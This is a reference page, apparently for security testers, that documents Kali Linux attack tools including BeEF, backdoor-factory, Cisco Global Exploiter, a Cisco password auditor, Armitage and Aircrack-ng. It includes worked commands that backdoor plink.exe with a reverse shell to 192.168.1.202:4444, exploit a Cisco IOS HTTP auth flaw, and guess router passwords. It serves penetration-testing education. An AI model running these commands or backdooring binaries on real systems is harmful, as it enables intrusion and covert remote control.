BeEF – Browser exploitation framework

Tool Description

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.

Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.

Tool Source: http://beefproject.com/

Kali Repo: http://git.kali.org/gitweb/?p=packages/beef-xss.git;a=summary

Video Tutorial: Coming Soon!

 

backdoor-factory – Patch win32/64 binaries with shellcode

Tool Description

The goal of BDF is patch executable binaries with user desired shellcode and continue normal execution of the pre patched state.

Supporting: Windows PE x32/x64 and Linux ELF x32/x64 (System V)

Some executables have built in protections, as such this will not work on all binaries. It is advisable that you test target binaries before deploying them to clients or using them in exercises.

Tool Source: https://github.com/secretsquirrel/the-backdoor-factory/

Kali Repo: http://git.kali.org/gitweb/?p=packages/backdoor-factory.git;a=summary

General Details

root@kali:~# backdoor-factory
-.(`-')  (`-')  _           <-.(`-') _(`-')                            (`-')
__( OO)  (OO ).-/  _         __( OO)( (OO ).->     .->        .->   <-.(OO )
'-'---.\  / ,---.   \-,-----.'-'. ,--.\    .'_ (`-')----. (`-')----. ,------,)
| .-. (/  | \ /`.\   |  .--./|  .'   /'`'-..__)( OO).-.  '( OO).-.  '|   /`. '
| '-' `.) '-'|_.' | /_) (`-')|      /)|  |  ' |( _) | |  |( _) | |  ||  |_.' |
| /`'.  |(|  .-.  | ||  |OO )|  .   ' |  |  / : \|  |)|  | \|  |)|  ||  .   .'
| '--'  / |  | |  |(_'  '--'\|  |\   \|  '-'  /  '  '-'  '  '  '-'  '|  |\  \
`------'  `--' `--'   `-----'`--' '--'`------'    `-----'    `-----' `--' '--'
           (`-')  _           (`-')                   (`-')
   <-.     (OO ).-/  _        ( OO).->       .->   <-.(OO )      .->
(`-')-----./ ,---.   \-,-----./    '._  (`-')----. ,------,) ,--.'  ,-.
(OO|(_\---'| \ /`.\   |  .--./|'--...__)( OO).-.  '|   /`. '(`-')'.'  /
 / |  '--. '-'|_.' | /_) (`-')`--.  .--'( _) | |  ||  |_.' |(OO \    /
 \_)  .--'(|  .-.  | ||  |OO )   |  |    \|  |)|  ||  .   .' |  /   /)
  `|  |_)  |  | |  |(_'  '--'\   |  |     '  '-'  '|  |\  \  `-/   /`
   `--'    `--' `--'   `-----'   `--'      `-----' `--' '--'   `--'

         Author:    Joshua Pitts
         Email:     the.midnite.runr[a t]gmail<d o t>com
         Twitter:   @midnite_runr

         v2.0.6

Usage: backdoor.py [options]

Options:
  -h, --help            show this help message and exit
  -f FILE, --file=FILE  File to backdoor
  -s SHELL, --shell=SHELL
                        Payloads that are available for use.
  -H HOST, --hostip=HOST
                        IP of the C2 for reverse connections
  -P PORT, --port=PORT  The port to either connect back to for reverse shells
                        or to listen on for bind shells
  -J, --cave_jumping    Select this options if you want to use code cave
                        jumping to further hide your shellcode in the binary.
  -a, --add_new_section
                        Mandating that a new section be added to the exe
                        (better success) but less av avoidance
  -U SUPPLIED_SHELLCODE, --user_shellcode=SUPPLIED_SHELLCODE
                        User supplied shellcode, make sure that it matches the
                        architecture that you are targeting.
  -c, --cave            The cave flag will find code caves that can be used
                        for stashing shellcode. This will print to all the
                        code caves of a specific size.The -l flag can be use
                        with this setting.
  -l SHELL_LEN, --shell_length=SHELL_LEN
                        For use with -c to help find code caves of different
                        sizes
  -o OUTPUT, --output-file=OUTPUT
                        The backdoor output file
  -n NSECTION, --section=NSECTION
                        New section name must be less than seven characters
  -d DIR, --directory=DIR
                        This is the location of the files that you want to
                        backdoor. You can make a directory of file backdooring
                        faster by forcing the attaching of a codecave to the
                        exe by using the -a setting.
  -w, --change_access   This flag changes the section that houses the codecave
                        to RWE. Sometimes this is necessary. Enabled by
                        default. If disabled, the backdoor may fail.
  -i, --injector        This command turns the backdoor factory in a hunt and
                        shellcode inject type of mechinism. Edit the target
                        settings in the injector module.
  -u SUFFIX, --suffix=SUFFIX
                        For use with injector, places a suffix on the original
                        file for easy recovery
  -D, --delete_original
                        For use with injector module.  This command deletes
                        the original file.  Not for use in production systems.
                        *Author not responsible for stupid uses.*
  -O DISK_OFFSET, --disk_offset=DISK_OFFSET
                        Starting point on disk offset, in bytes. Some authors
                        want to obfuscate their on disk offset to avoid
                        reverse engineering, if you find one of those files
                        use this flag, after you find the offset.
  -S, --support_check   To determine if the file is supported by BDF prior to
                        backdooring the file. For use by itself or with
                        verbose. This check happens automatically if the
                        backdooring is attempted.
  -q, --no_banner       Kills the banner.
  -v, --verbose         For debug information output.

 Usage Example

Specify the binary to backdoor (-f /usr/share/windows-binaries/plink.exe), set the connect-back IP (-H 192.168.1.202), the connect-back port (-P 4444), and the shell to use (-s reverse_shell_tcp):

root@kali:~# backdoor-factory -f /usr/share/windows-binaries/plink.exe -H 192.168.1.202 -P 4444 -s reverse_shell_tcp
__________                __       .___                   
\______   \_____    ____ |  | __ __| _/____   ___________ 
 |    |  _/\__  \ _/ ___\|  |/ // __ |/  _ \ /  _ \_  __ \ 
 |    |   \ / __ \\  \___|    </ /_/ (  <_> |  <_> )  | \/
 |______  /(____  /\___  >__|_ \____ |\____/ \____/|__|   
        \/      \/     \/     \/    \/                    
___________              __                               
\_   _____/____    _____/  |_  ___________ ___.__.        
 |    __) \__  \ _/ ___\   __\/  _ \_  __ <   |  |        
 |     \   / __ \\  \___|  | (  <_> )  | \/\___  |        
 \___  /  (____  /\___  >__|  \____/|__|   / ____|        
     \/        \/     \/                   \/             

         Author:    Joshua Pitts
         Email:     the.midnite.runr[a t]gmail<d o t>com
         Twitter:   @midnite_runr
         
         v2.0.6 
         
[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Looking for caves that will fit the minimum shellcode length of 358
[*] All caves lengths:  (358,)
############################################################
The following caves can be used to inject code and possibly
continue execution.
**Don't like what you see? Use jump, single, or append.**
############################################################
[*] Cave 1 length as int: 358
[*] Available caves: 
1. Section Name: None; Section Begin: None End: None; Cave begin: 0x280 End: 0x1000; Cave Size: 3456
2. Section Name: .text; Section Begin: 0x1000 End: 0x37000; Cave begin: 0x36981 End: 0x37000; Cave Size: 1663
3. Section Name: None; Section Begin: None End: None; Cave begin: 0x47cec End: 0x48004; Cave Size: 792
4. Section Name: .data; Section Begin: 0x48000 End: 0x4a000; Cave begin: 0x48961 End: 0x48b90; Cave Size: 559
5. Section Name: None; Section Begin: None End: None; Cave begin: 0x4907c End: 0x4a00e; Cave Size: 3986
**************************************************
[!] Enter your selection: 2
Using selection: 2
[*] Changing Section Flags
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] /usr/share/windows-binaries/plink.exe backdooring complete
File /usr/share/windows-binaries/plink.exe is in the 'backdoored' directory

Video Tutorial: Coming Soon!

 

cisco-global-exploiter – Simple and fast security testing tool

Tool Description

Cisco Global Exploiter (CGE), is an advanced, simple and fast security testing tool.

Tool Source: http://www.blackangels.it/

Kali Repo: http://git.kali.org/gitweb/?p=packages/cisco-global-exploiter.git;a=summary

General Details

root@kali:~# cge.pl

Usage :
perl cge.pl <target> <vulnerability number>

Vulnerabilities list :
[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability
[2] - Cisco IOS Router Denial of Service Vulnerability
[3] - Cisco IOS HTTP Auth Vulnerability
[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
[6] - Cisco 675 Web Administration Denial of Service Vulnerability
[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability
[9] - Cisco 514 UDP Flood Denial of Service Vulnerability
[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
[11] - Cisco Catalyst Memory Leak Vulnerability
[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
[13] - 0 Encoding IDS Bypass Vulnerability (UTF)
[14] - Cisco IOS HTTP Denial of Service Vulnerability

Usage Example

Attack the target host (192.168.99.230) using the Cisco IOS HTTP Auth Vulnerability (3):

root@kali:~# cge.pl 192.168.99.230 3

Vulnerability successful exploited with [http://192.168.99.230/level/17/exec/....] ...

 Video Tutorial: Coming Soon!

cisco-auditing-tool – Scans Cisco routers for common vulnerabilities

Tool Description

Perl script which scans cisco routers for common vulnerabilities.

Tool Source: http://www.scrypt.net/

Kali Repo: http://git.kali.org/gitweb/?p=packages/cisco-auditing-tool.git;a=summary

General Details

root@kali:~# CAT

Cisco Auditing Tool - g0ne [null0]
Usage:
    -h hostname (for scanning single hosts)
    -f hostfile (for scanning multiple hosts)
    -p port #   (default port is 23)
    -w wordlist (wordlist for community name guessing)
    -a passlist (wordlist for password guessing)
    -i [ioshist]    (Check for IOS History bug)
    -l logfile  (file to log to, default screen)
    -q quiet mode   (no screen output)

Usage Example

Scan the host (-h 192.168.99.230) on port 23 (-p 23), using a password dictionary file (-a /usr/share/wordlists/nmap.lst):

root@kali:~# CAT -h 192.168.99.230 -p 23 -a /usr/share/wordlists/nmap.lst 

Cisco Auditing Tool - g0ne [null0]

Checking Host: 192.168.99.230


Guessing passwords: 

Invalid Password: 123456
Invalid Password: 12345

Video Tutorial: Coming Soon!

Armitage – Red Team collaboration tool

Tool Description

Armitage is a scriptable red team collaboration tool for Metasploit that visualizes targets, recommends exploits, and exposes the advanced post-exploitation features in the framework.

Through one Metasploit instance, your team will:

  • Use the same sessions
  • Share hosts, captured data, and downloaded files
  • Communicate through a shared event log.
  • Run bots to automate red team tasks.

Armitage is a force multiplier for red team operations.

Tool Source: http://www.fastandeasyhacking.com/manual#0

Kali Repo: http://git.kali.org/gitweb/?p=packages/armitage.git;a=summary

Included Tools:

  • Armitage
  • Teamserver

Video Tutorial: Coming Soon!

 

AIRCRACK-NG

Tool Description

Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimisations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools.

Tool Source: http://aircrack-ng.org/

Kali Repo: http://git.kali.org/gitweb/?p=packages/aircrack-ng.git;a=summary

Included Tools:

  • airbase-ng – Configure fake access points
  • aircrack-ng – Wireless password cracker
  • airdecap-ng – Decrypt WEP/WPA/WPA2 capture files
  • airdecloak-ng – Removes WEP cloaking from a pcap file
  • airdriver-ng – Provides status information about the wireless drivers on your system
  • aireplay-ng –  Primary function is to generate traffic for later use in aircrack-ng
  • airmon-ng – This script can be used to enable monitor mode on wireless interfaces
  • airmon-zc – This script can be used to enable monitor mode on wireless interfaces
  • airodump-ng – Used for packet capturing of raw 802.11 frames
  • airodump-ng-oui-update – Downloads and parses IEEE OUI list
  • airolib-ng – Designed to store and manage essid and password lists
  • airserv-ng – A wireless card server
  • airtun-ng – Virtual tunnel interface creator
  • besside-ng -Automatically crack WEP and WPA networks
  • buddy-ng
  • easside-ng – An auto-magic tool which allows you to communicate via an WEP-encrypted access point
  • ivstools – This tool handle .ivs files. You can either merge or convert them
  • kstats
  • makeivs-ng – Generates initialization vectors
  • packetforge-ng – Create encrypted packets that can subsequently be used for injection
  • tkiptun-ng – This tool is able to inject a few frames into a WPA TKIP network with QoS
  • wesside-ng – Auto-magic tool which incorporates a number of techniques to seamlessly obtain a WEP key
  • wpaclean – Remove excess data from a pcap file

Video Tutorial: Coming Soon!